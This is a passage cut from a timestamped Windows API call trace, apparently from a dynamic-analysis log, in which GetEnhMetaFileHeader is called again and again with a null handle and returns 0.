lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 